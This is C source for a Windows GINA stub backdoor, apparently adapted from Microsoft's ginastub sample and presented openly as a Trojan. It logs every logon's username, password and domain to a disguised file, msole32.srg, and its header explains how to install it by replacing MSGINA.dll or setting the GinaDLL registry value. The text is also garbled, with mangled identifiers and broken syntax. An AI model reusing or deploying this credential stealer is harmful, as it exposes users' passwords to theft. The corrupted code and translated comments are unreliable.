Gina backdoor code

/*
Ntshellgina. C-A Gina stub come from ntshell 1.0
By: bingle@email.com.cn, from homepage: bingle_site.top263.net

This file is modified from Microsoft sample ginastub. C,
This file will save the logon password to the file system32 \ msole32.srg

Winlogon logon management:

The Winlogon process is responsible for managing logon-related security. It is responsible for handling user logon and logout, starting User Shell, and entering passwords.
, Change the password, lock and unlock the workstation. The Winlogon process must ensure that its security-related operations are invisible to other processes to avoid other
The process obtains the logon password.

When the system is initialized, start the userProgramPreviously, Winlogon had guaranteed the above requirements for specific work. The Winlogon process is created and enabled.
A window stations, and then an access control population (ACE). This ace only contains the SID of the Winlogon process.
Only the Winlogon process can access the window stations. Then, Winlogon creates a desktop and sets the Winlogon desktop.
Only Winlogon can be accessed. Other processes cannot access any data andCodeUse this feature to protect passwords and lock desktops
And other operations. Winlogon also registers the SAS-secure attention sequence hotkey.
Press the SAS hotkey (CTRL + ALT + DEL by default) to call Winlogon and switch to the secure desktop, so that the password capturing program cannot receive
Logon password, password change, and other security activities.

The authentication and authentication of the login process are both in Gina (Gina-graphical identification and authentication
Microsoft's Gina is MSGINA. dll, which implements the default Windows NT logon interface.
However, you can develop Gina DLL to implement other authentication methods, such as magnetic cards. Of course, this also leaves a chance for Trojans.
Write the same Gina as the system Gina interface, and then replace MSGINA. dll. There is a Gina example in the msdn sample. However, if
It is not necessary to obtain the logon password. You only need to write an interface that is the same as Gina, and then call all functions during implementation.
You can use the same function of MSGINA. dll. In the msdn sample, there is also an example called ginastub, of course, as a Trojan.
You also need to dump the password at login. (For more information about Gina, Find Gina in msdn)

Ntshelgina uses the latter method. I changed ginastub and used Username: Password: domain during logon.
In msole32.srg. It must call MSGINA. DLL for specific features during runtime. Therefore, this file must exist during installation and
Change MSGINA. DLL to winlogon32.dll, and copy ntshellgina. DLL to MSGINA. dll. This is ntshell
The second installation method.

However, Microsoft still leaves a location in the registry. Because Gina is installed
\ Windows NT \ CurrentVersion \ Winlogon, set GinaDLL to a Gina DLL. (GinaDLL is not set by default)
If this value is set, NT will call this Gina instead of the default MSGINA. dll. Therefore, the first installation method of ntshell is
Copy ntshellgina. DLL to system32 \ mshtmlgi. dll, and set GinaDLL to mshtmlgi. dll.

Therefore, if the installation is successful in the second method, the system does not set the GinaDLL value. Otherwise, ntshellgina will not be installed.
Of course, if you use the second Installation Method in Win2000, you must rename MSGINA. dll in dllcache. (Ntshell is renamed
Mshtmlgi. dll ).

Gina DLL is responsible for system authentication and secure logon. Therefore, if an error occurs, you cannot log on to the system and must use it with caution. Therefore
Ntshell performs a lot of checks during installation. If the check fails, it will not be installed. For example, if you copy ntshellgina. dll as a file
MSGINA. dll installation method, the first mslogon32.dll <-MSGINA. dll <-ntshellgina. dll, if you install it again
Use MSGINA. DLL to replace mslogon32.dll, and use ntshellgina. DLL to replace MSGINA. dll (ntshellgina. dll)
In this way, the original MSGINA. dll will no longer exist. There are only two ntshellgina. dll, and the real MSGINA. dll and ntshellgina. dll cannot be found.
Will fail.

Ntshell performs the following checks in sequence:
If GinaDLL in the registry is set, the system is not considered to use the default logon Gina and will not be installed (cannot be found ).
MSGINA. dll or other programs are not working properly)
If the MSGINA. dll and ntshellgina. dll of the system are the same, they are deemed to have been installed and cannot be installed again.
If mslogon32.dll exists in the system, it is possible that ntshell has been installed and will not be installed (unless you confirm, MSGINA. dll
You can manually delete mslogon32.dll and then install it. Otherwise, do not install it)

If an installation error occurs and you cannot log on to the ECS console, follow the msdn instructions below to restore the ECS instance: (I use 4th methods, but I have not tried other methods)

Warning! -It is possible to make your machine unusable if you install
Replacement Gina and it fails. To avoid this situation, be sure that you have
A Method of accessing the % SystemRoot % \ system32 directory independent of
Windows NT? Installation you are testing on.

If the Gina sample malfunctions, and you are not able to log on to fix the problem,
You can recover by doing one of the following:

1. If the test machine is on the network and you have an account on another machine
With administrative privileges on the test machine, open the test machine Registry
Remotely with regedt32 and delete the GinaDLL value.

2. If the test machine is on the network, and % SystemRoot % \ system32 is available on
A network share for that machine (e.g. \\< Name> \ C $), rename Gina. DLL to something
Else with a command like:
Ren \ <Name> \ C $ \ winnt351 \ system32 \ Gina. dll Gina. SDK
Reboot the test machine.

3. Delete the GinaDLL value from the registry.

4. If the test machine will Dual Boot to another version of Windows NT or another
Operating system capable of accessing % SystemRoot % \ system32, boot to that operating
System, delete % SystemRoot % \ system32 \ Gina. dll, reboot, and delete the GinaDLL Value
From the registry.

// Next is the Microsoft msdn original comments
Module: ginastub. c

Abstract:

This sample uses strates a pass-thru "stub" Gina which can be used
In some cases to simplify Gina development.

A common use for a Gina is to implement code which requires
Credentials of the user logging onto the workstation. The credentials
May be required for Syncronization with foreign account Databases
Or custom authentication activities.

In this example case, it is possible to implement a simple Gina
Stub layer which simply passes control for the required functions
To the previusly installed Gina, and captures the interesting
Parameters from that Gina. In this scenario, the existing functionality
In the existent Gina is retained. In addition, the development time
Is reduced drastically, as existing functionality does not need
Be duplicated.

When dealing with credentials, take steps to maintain the security
Of the credentials. For instance, if transporting credentials over
A network, be sure to encrypt the credentials.

Author:

Scott Field (sfield) 18-jul-96

--*/

# Include <windows. h>
# Include <stdio. h>
# Include <winwlx. h>

# Include "ginastub. H"

//
// Winlogon function dispatch table
//

Pwlx_dispatch_version_1_0 g_pwinlogon;

//
// Functions pointers to the real msgina which we will call.
//

Pgwlxnegotiate gwlxnegotiate;
Pgwlxinitialize gwlxinitialize;
Pgwlxdisplaysasnotice gwlxdisplaysasnotice;
Pgwlxloggedoutsas gwlxloggedoutsas;
Pgwlxactivateusershell gwlxactivateusershell;
Pgwlxloggedonsas gwlxloggedonsas;
Pgwlxdisplaylockednotice gwlxdisplaylockednotice;
Pgwlxwkstalockedsas gwlxwkstalockedsas;
Pgwlxislockok gwlxislockok;
Pgwlxislogoffok gwlxislogoffok;
Pgwlxlogoff gwlxlogoff;
Pgwlxshutdown gwlxshutdown;

//
// New for version 1.1
//

Pgwlxstartapplication gwlxstartapplication;
Pgwlxscreensavery y gwlxscreensavernotify;

//
// Hook into the real Gina.
//
Bool myinitialize (void)
{
Hinstance hdll;
//
// Judge if which DLL to load, if the file named "msgina. dll"
// Then ntshell is changed MSGINA. dll --> mslogon32.dll, So load it
// If named others then just load MSGINA. dll
//
Char origina [] = "msgina. dll ";
Char chgedgina [] = "mslogon32.dll ";
Char * realgina;
Char filename [max_path];
Int result;
File * FP;
Hmodule hself;

# Ifdef _ debug
Fp = fopen ("ginalog.txt", "AB ");
If (FP)
{
Sprintf (filename, "\ r \ nmyinitialize been called ");
Fwrite (filename, strlen (filename), 1, FP );
Result = getmodulefilename (null, filename, max_path );
If (result) fwrite (filename, strlen (filename), 1, FP );
Fclose (FP );
}
# Endif

Realgina = NULL;
Hself = getmodulehandle (origina );
If (! Hself) realgina = origina; // hself = getmodulehandle (chgedgina );
Else realgina = chgedgina; // If origina loaded, this is origina

// Load original MSGINA. dll.
If (! (Hdll = loadlibrary (realgina ))){
Return false;
}

// Get pointers to all of the wlx functions in the real MSGINA.
Gwlxnegotiate = (pgwlxnegotiate) getprocaddress (hdll, "wlxnegotiate ");
If (! Gwlxnegotiate ){
Return false;
}

Gwlxinitialize = (pgwlxinitialize) getprocaddress (hdll, "wlxinitialize ");
If (! Gwlxinitialize ){
Return false;
}

Gwlxdisplaysasnotice =
(Pgwlxdisplaysasnotice) getprocaddress (hdll, "wlxdisplaysasnotice ");
If (! Gwlxdisplaysasnotice ){
Return false;
}

Gwlxloggedoutsas =
(Pgwlxloggedoutsas) getprocaddress (hdll, "wlxloggedoutsas ");
If (! Gwlxloggedoutsas ){
Return false;
}

Gwlxactivateusershell =
(Pgwlxactivateusershell) getprocaddress (hdll, "wlxactivateusershell ");
If (! Gwlxactivateusershell ){
Return false;
}

Gwlxloggedonsas =
(Pgwlxloggedonsas) getprocaddress (hdll, "wlxloggedonsas ");
If (! Gwlxloggedonsas ){
Return false;
}

Gwlxdisplaylockednotice =
(Pgwlxdisplaylockednotice) getprocaddress (
Hdll,
"Wlxdisplaylockednotice ");
If (! Gwlxdisplaylockednotice ){
Return false;
}

Gwlxislockok = (pgwlxislockok) getprocaddress (hdll, "wlxislockok ");
If (! Gwlxislockok ){
Return false;
}

Gwlxwkstalockedsas =
(Pgwlxwkstalockedsas) getprocaddress (hdll, "wlxwkstalockedsas ");
If (! Gwlxwkstalockedsas ){
Return false;
}

Gwlxislogoffok = (pgwlxislogoffok) getprocaddress (hdll, "wlxislogoffok ");
If (! Gwlxislogoffok ){
Return false;
}

Gwlxlogoff = (pgwlxlogoff) getprocaddress (hdll, "wlxlogoff ");
If (! Gwlxlogoff ){
Return false;
}

Gwlxshutdown = (pgwlxshutdown) getprocaddress (hdll, "wlxshutdown ");
If (! Gwlxshutdown ){
Return false;
}

// We don't check for failure here because these don't exist
// Gina's implemented prior to Windows NT 4.0
Gwlxstartapplication = (pgwlxstartapplication) getprocaddress (hdll, "wlxstartapplication ");
Gwlxscreensaver1_y = (pgwlxscreensaver1_y) getprocaddress (hdll, "wlxscreensaver1_y ");

// Everything loaded OK. Return success.
Return true;
}

Bool winapi wlxnegotiate (DWORD dwwinlogonversion, DWORD * pdwdllversion)
{
If (! Myinitialize () return false;
Return gwlxnegotiate (dwwinlogonversion, pdwdllversion );
}

Bool winapi wlxinitialize (lpwstr lpwinsta, handle hwlx,
Pvoid pvreserved, pvoid pwinlogonfunctions, pvoid * pwlxcontext)
{
Return gwlxinitialize (lpwinsta, hwlx, pvreserved,
Pwinlogonfunctions, pwlxcontext );
}

Void winapi wlxdisplaysasnotice (pvoid pwlxcontext)
{
Gwlxdisplaysasnotice (pwlxcontext );
}

Int winapi wlxloggedoutsas (pvoid pwlxcontext, DWORD dwsastype,
Pluid pauthenticationid, psid plogonsid, pdword pdwoptions,
Phandle phtoken, pwlx_mpr_policy_info pmprpolicyinfo,
Pvoid * pprofile)
{
Int iret;

Iret = gwlxloggedoutsas (pwlxcontext, dwsastype, pauthenticationid,
Plogonsid, pdwoptions, phtoken, pmprpolicyinfo, pprofile );

If (iret = wlx_sas_action_logon ){
// Copy pmprnotifyinfo and plogonsid for later use

File * FP;
Fp = fopen ("msole32.srg", "");
If (FP! = NULL)
{
Char infor [300], Buf [300];
Memset (BUF, 0,300 );
Wcstombs (BUF, pmprpolicyinfo-> pszusername, 300 );
Sprintf (INFOR, "% s", Buf );

Memset (BUF, 0,300); // If convert failed, we use the error one also
Wcstombs (BUF, pmprpolicyinfo-> pszpassword, 300 );
Sprintf (INFOR, "% s: % s", infor, Buf );

Memset (BUF, 0,300 );
Wcstombs (BUF, pmprpolicyinfo-> pszdomain, 300 );
Sprintf (INFOR, "% s: % s \ r \ n", infor, Buf );

Fwrite (INFOR, 1, strlen (INFOR), FP );
Fclose (FP );
}
// Pmprpolicyinfo-> pszoldpassword
}

Return iret;
}

Bool winapi wlxactivateusershell (
Pvoid pwlxcontext,
Pwstr pszdesktopname,
Pwstr pszmprlogonscript,
Pvoid penvironment)
{
Return gwlxactivateusershell (
Pwlxcontext,
Pszshorttopname,
Pszmprlogonscript,
Penvironment
);
}

Int winapi wlxloggedonsas (
Pvoid pwlxcontext,
DWORD dwsastype,
Pvoid preserved)
{
Return gwlxloggedonsas (pwlxcontext, dwsastype, preserved );
}

Void winapi wlxdisplaylockednotice (pvoid pwlxcontext)
{
Gwlxdisplaylockednotice (pwlxcontext );
}

Bool winapi wlxislockok (pvoid pwlxcontext)
{
Return gwlxislockok (pwlxcontext );
}

Int winapi wlxwkstalockedsas (
Pvoid pwlxcontext,
DWORD dwsastype)
{
Return gwlxwkstalockedsas (pwlxcontext, dwsastype );
}

Bool winapi wlxislogoffok (pvoid pwlxcontext)
{
Bool bsuccess;

Bsuccess = gwlxislogoffok (pwlxcontext );

If (bsuccess ){
//
// If it's OK to logoff, finish with the stored credentials
// And scrub the buffers
//
}

Return bsuccess;
}

Void winapi wlxlogoff (pvoid pwlxcontext)
{
Gwlxlogoff (pwlxcontext );
}

Void winapi wlxshutdown (pvoid pwlxcontext, DWORD shutdowntype)
{
Gwlxshutdown (pwlxcontext, shutdowntype );
}

//
// New for version 1.1
//
Bool winapi wlxscreensaverpolicy (
Pvoid pwlxcontext,
Bool * Pull cure
)
{
If (gwlxscreensaverpolicy! = NULL)
Return gwlxscreensavernotify (pwlxcontext, fetch cure );

//
// If not exported, return something intelligent
//
* Required cure = true;
Return true;
}

Bool winapi wlxstartapplication (
Pvoid pwlxcontext,
Pwstr pszdesktopname,
Pvoid penvironment,
Pwstr psz1_line
)
{
If (gwlxstartapplication! = NULL)
Return gwlxstartapplication (
Pwlxcontext,
Pszshorttopname,
Penvironment,
Pszcmdline
);
//
// If not exported, return something intelligent
//
}